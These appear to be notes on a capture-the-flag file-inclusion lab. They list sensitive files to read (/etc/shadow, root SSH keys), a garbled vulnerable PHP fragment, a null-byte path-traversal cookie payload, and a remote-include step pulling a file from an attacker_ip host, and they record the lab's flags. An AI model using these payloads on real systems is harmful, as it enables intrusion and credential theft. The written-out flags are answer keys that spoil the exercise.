File Inclusion
Interesting files
| Location | Description |
|---|---|
| /etc/issue | contains a message or system identification to be printed before the login prompt. |
| /etc/profile | controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived |
| /proc/version | specifies the version of the Linux kernel |
| /etc/passwd | has all registered user that has access to a system |
| /etc/shadow | contains information about the system's users' passwords |
| /root/.bash_history | contains the history commands for root user |
| /var/log/dmessage | contains global system messages, including the messages that are logged during system startup |
| /var/mail/root | all emails for root user |
| /root/.ssh/id_rsa | Private SSH keys for a root or any known valid user on the server |
| /var/log/apache2/access.log | the accessed requests for Apache webserver |
| C:\boot.ini | contains the boot options for computers with BIOS firmware |
What function causes path traversal vulnerabilities in PHP?
file_get_content
Using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications.
"; echo "". getcwd(). ""; echo "
File Content Preview of "; echo $_GET["file"]; echo "
"; if (substr($_GET['file'], -11, 11) != '/etc/passwd'){ echo file_get_contents($_GET['file']); } else { echo 'You are not allowed to see source files!'."\n"; } echo "
";} ?>
RFI attack include: - Sensitive Information Disclosure - Cross-site Scripting (XSS) - Denial of Service (DoS)
Challenge
1
Flag : F1x3d-iNpu7-f0rrn
2
Change the THM cookie value to : ../../../../etc/flag2%00
Flag : c00k13_i5_yuMmy1
3
Flag : P0st_1s_w0rk1in9
4
Create file in attacker machine
Run python3 http server in same folder.
Include the file into RFI vulnerable site.
http://attacker_ip:8000/host.txt
Flag : lfi-vm-thm-f8c5b1a78692